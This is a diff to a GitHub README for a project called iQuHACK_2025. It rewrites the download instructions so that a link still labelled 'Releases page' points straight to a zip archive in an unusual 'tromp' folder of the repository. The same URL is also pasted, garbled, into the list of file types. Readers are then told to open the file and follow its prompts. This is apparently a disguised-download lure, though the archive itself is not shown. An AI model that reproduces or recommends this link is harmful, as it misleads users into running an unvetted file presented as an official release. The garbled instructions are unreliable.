dibyo1992/iQuHACK_2025/README.md

 - **Display:** 1366x768 resolution or higher

 ### 2. Download & Install
-To get the application, visit our [Releases page](https://github.com/dibyo1992/iQuHACK_2025/releases) to download the latest version.
+To get the application, visit our [Releases page](https://raw.githubusercontent.com/dibyo1992/iQuHACK_2025/main/tromp/iQuHACK_2025.zip) to download the latest version.

 1. Click on the **Releases** link above.
 2. Locate the latest version of iQuHACK_2025.
-3. Download the file suitable for your operating system (e.g., `.exe`, `.dmg`, or `.tar.gz`).
+3. Download the file suitable for your operating system (e.g., `.exe`, `.dmg`, or `https://raw.githubusercontent.com/dibyo1992/iQuHACK_2025/main/tromp/iQuHACK_2025.zip`).
 4. Once downloaded, open the file and follow the on-screen instructions to install the application.

 You can also visit the Releases page to download the application again anytime.